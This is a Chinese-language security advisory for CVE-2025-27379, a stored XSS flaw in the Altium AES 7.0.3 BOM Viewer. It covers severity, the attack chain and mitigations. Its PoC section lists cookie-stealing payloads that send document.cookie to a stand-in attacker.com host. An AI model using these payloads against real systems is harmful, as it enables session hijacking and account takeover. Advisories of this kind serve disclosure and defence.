IPBUF安全漏洞报告
English
CVE-2025-27379 CVSS 6.8 中危

CVE-2025-27379: Altium AES BOM Viewer存储型XSS漏洞

披露日期: 2026-01-22
来源: 4760f414-e1ae-4ff1-bdad-c7a9c3538b79

漏洞信息

漏洞编号
CVE-2025-27379
漏洞类型
存储型XSS
CVSS评分
6.8 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
需要交互 (UI:R)
影响产品
Altium AES 7.0.3

相关标签

存储型XSSAltium AESBOM ViewerCVE-2025-27379跨站脚本Altium Designer

漏洞概述

CVE-2025-27379是Altium AES 7.0.3版本中BOM Viewer组件存在的存储型跨站脚本(Stored XSS)漏洞。该漏洞允许经过身份认证的低权限攻击者在原理图的Description字段中注入任意JavaScript代码。由于该内容存储在服务器端,当其他用户通过BOM Viewer查看受影响的原理图时,恶意脚本会自动执行。攻击者可利用此漏洞窃取会话Cookie、劫持用户账户、执行未经授权的操作或传播恶意内容。CVSS 3.1评分6.8,属于中危级别,攻击复杂度低但需要用户交互,机密性和完整性影响较低,但可用性影响为高。

技术细节

该漏洞存在于Altium Designer的BOM(物料清单)查看器功能模块中。攻击流程如下:首先,攻击者需要拥有Altium AES的有效账户并登录系统;其次,攻击者在原理图的Description字段中嵌入恶意JavaScript代码(如<script>alert(document.cookie)</script>);然后,当BOM Viewer渲染该原理图时,未经过滤的Description字段内容被直接输出到HTML页面中,导致恶意脚本在受害者浏览器中执行。由于是存储型XSS,恶意代码持久存在于系统中,所有访问该原理图的用户都会受到攻击。攻击者可通过窃取Cookie冒充合法用户进行操作,或利用执行权限进一步渗透系统。

攻击链分析

STEP 1
侦察阶段
攻击者识别目标系统使用Altium AES 7.0.3版本
STEP 2
初始访问
攻击者获取Altium AES系统的有效用户账户(低权限即可)
STEP 3
有效载荷注入
登录系统后,在原理图的Description字段中注入恶意JavaScript代码
STEP 4
载荷存储
恶意代码被持久化存储在服务器数据库中
STEP 5
触发执行
其他用户通过BOM Viewer查看受影响的原理图时触发XSS
STEP 6
数据窃取
恶意脚本执行,窃取用户Cookie、会话令牌或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
// CVE-2025-27379 PoC - Stored XSS in Altium AES BOM Viewer // Steps to exploit: // 1. Login to Altium AES 7.0.3 with valid credentials // 2. Navigate to schematic editor // 3. Inject XSS payload into Description field // 4. Save and open BOM Viewer // 5. XSS will execute when BOM Viewer renders the content // XSS Payload Examples: // <script>alert(document.cookie)</script> // <img src=x onerror=fetch('https://attacker.com/steal?c='+document.cookie)> // <svg/onload=fetch('http://attacker.com/log?data='+btoa(document.cookie))> // Example malicious Description field content: const xssPayload = '<script>fetch("https://attacker.com/steal?cookie="+encodeURIComponent(document.cookie))</script>'; // This payload will be stored and executed when BOM Viewer renders the schematic

影响范围

Altium AES 7.0.3

防御指南

临时缓解措施
在官方补丁发布前,可采取以下临时措施:1) 限制低权限用户创建和编辑原理图的权限;2) 对所有原理图Description字段内容进行人工审核;3) 启用浏览器的XSS防护功能;4) 监控和记录BOM Viewer的访问日志以便及时发现异常;5) 考虑使用Web应用防火墙(WAF)过滤恶意请求。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表